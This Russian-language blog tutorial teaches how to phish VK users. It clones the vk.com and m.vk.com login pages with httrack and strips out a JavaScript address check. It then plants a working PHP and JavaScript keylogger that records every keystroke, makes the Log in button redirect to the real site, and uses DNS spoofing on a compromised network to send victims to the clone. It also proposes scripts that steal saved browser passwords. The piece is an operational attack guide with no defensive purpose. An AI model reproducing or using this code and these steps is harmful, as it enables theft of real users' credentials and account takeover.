Fishing, dnsspoofing, apache2,php,javascript, httrack
GrayHat
Сегодня предлагаю порыбачить =) Тема фишинга никогда не устареет и не помрет. Это один из немногих способов, которые дают 99% результат.
В видео я покажу, как работают готовые решения по данному типу атак, такие как settoolkit, morpheus, но в данной статье, я хочу научить, как разбираться в структуре сайта и понимать, как его надо переписать под себя, в моем случае, как сделать так, чтобы логи и пароли падали на сервер, а также при нажатии на кнопку Log in пользователей перебрасывало на офф сайт вк.
Раннее мы рассматривали один из способов нахождения уязвимых роутеров, на которых впоследствии можно изменить первичный днс адрес, установив свой, и перенаправлять трафик на нужные нам сайты. Есть несколько нюансов, к которым некоторые из вас пока не готовы. Какой хостинг выбрать, как на нем поднять днс сервер, как написать сайт, идентичный оригиналу и сколько нужно для этого денег =). Да и к тому же не каждый роутер имеет дефолтный лог и пас в админке, это же реальный суровый мир =) Приходится импровизировать на лету, как говорится. Поэтому сегодня мы рассмотрим вариант поднятия вебсервера на своей машине, благо apache2 уже предустановлен в Кали 2017.
На самом деле apache2 или nginx... тут все индивидуально, кому что ближе. У меня возникли некоторые трудности, чтобы настроить nginx и php7, я психанула, снесла php7 и поставила php5.6 и все нормально заработало. Но я не сисадмин и всех тонкостей не знаю ). А вот с apache2 все заработало нормально.
Ладно, приступим к делу. Где взять сайт, допустим vk.com. Тут на самом деле все не сложно, можно просто скопировать. Но вот беда, если просто скопипастить исходный код страницы, получим такой бред. Кстати готовые решения, как settoolkit и morpheus скопируют также =(
Не презентабельно...и врятли кто-нибудь поведется.
Будем клонировать сайт, а точнее его приветственную страницу. Для этого будем использовать httrack. На самом деле эта программа уникальна, она может копировать, как весь сайт, так и его отдельные части.
Самый простой запуск этой программы будет выглядеть примерно так : httrack vk.com -O /var/www/html, но для вк искренне не советую так делать, ибо копировать весь вк...такая себе затея =) Это чаще делается на сайтах поменьше для полного анализа структуры, всех папок и файлов. Думаю в дальнейшем еще разберем все ее возможности. Но на данном этапе будем действовать по иному сценарию.
Для начала надо использовать параметр для ввода пользовательского агента, который можно посмотреть по ссылке здесь =)
Соответственно будем использовать параметр -F Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Далее нам нужен будет параметр -r2 для копирования только одной страницы.
Итак, соберем все в кучу и получим httrack https://vk.com -r2 -F Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 -O "/var/www/html/vk.com" и получится следующее:
Сайт будет скопирован. В папке vk.com будут несколько файлов, которые сделал httrack, их можно удалить и оставить только одну папку vk.com
Удаляем, перемещаем файлы из подпапки vk.com в папку vk.com повыше и тогда у нас не будет в адресной строке путь localhost/vk.com/vk.com
После манипуляций с файлами адрес будет localhost/vk.com
С веб версией все понятно. Но если вы попробуете скопировать мобильную версию m.vk.com, возникнут некоторые трудности, там javascript проверяет достоверность адреса и не дает страничке подгрузиться. И не забудьте поменять юзер агента для мобильной версии =)
Команда будет выглядеть так
httrack https://m.vk.com -r2 -F "Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build/IML74K) AppleWebkit/999+ (KHTML, like Gecko) Safari/999.9" -O "/var/www/html/mvk/"
Когда сайт скопируется и вы попробуете на него зайти, у вас ничего не выйдет =( поэтому выполняем команду
nano /var/www/html/mvk/m.vk.com/index.html и удаляем выделенное
И сайт отлично работает.
Здорово! У нас есть сайты, которые идентичны оригинальным. Но логи нигде не сохраняются, и посмотреть, кто что вбивал в поля у нас не получится, поэтому приступим к веб программированию =)) Сегодня мы внедрим в наш сайт keylogger, напишем его на php и javascript. Это просто забавно на самом деле ) В следующих статьях можем переписать формы заполнения, чтобы логи и пасы ссыпались отдельно, но таких видео манулов много, поэтому решила побаловаться с кейлогером. Будем редактировать vk.com
От слов к делу. Создадим 3 файла keylogger.php, keylogger.js и keylog.txt =)
В keylogger.php вводим :
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>
В keylogger.js вводим:
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
И теперь в наш index.php надо добавить строку:
<script src="keylogger.js"></script>
Это простейший кейлогер, думаю даже на просторах интернета похожий где-нибудь будет.
Так теперь идем редактировать index.php, ищем строчку "Log in" и ищем параметр onclick="top.showBox(....и меняем адрес на https://vk.com
После этого при нажатии на кнопку Log in пользователь будет направлен на офф сайт vk.
Дальше можно использовать dnsspoofing в сети и перенаправлять всех пользователей на этот сайт ) и записывать логи и пасы из кейлогера. Во взломанной сети этим приятней заниматься, потому что клоны банят в открытой сети, а локально не получится. Хотя некоторые браузеры могут и поругаться.
Смысл этой статьи даже не во взломе вк, потому что это банально. Вы можете клонировать любой сайт и прописать в нем что угодно, любой javascript вплоть до того, чтобы воровать все пароли браузера =) Чаще это могут быть даже форумы, а с тем учетом, что у 85% людей логины и пароли везде одинаковые....
Ниже будут 2 видео:
1 - для ленивых, в котором покажу уже готовые решения для фишинга.
2 - видео по написанной статье, в котором покажу каждый описанный мною шаг. Так будет наглядней и может быть возникнут какие-либо трудности, которые придется решать на ходу.
Так что наслаждайтесь )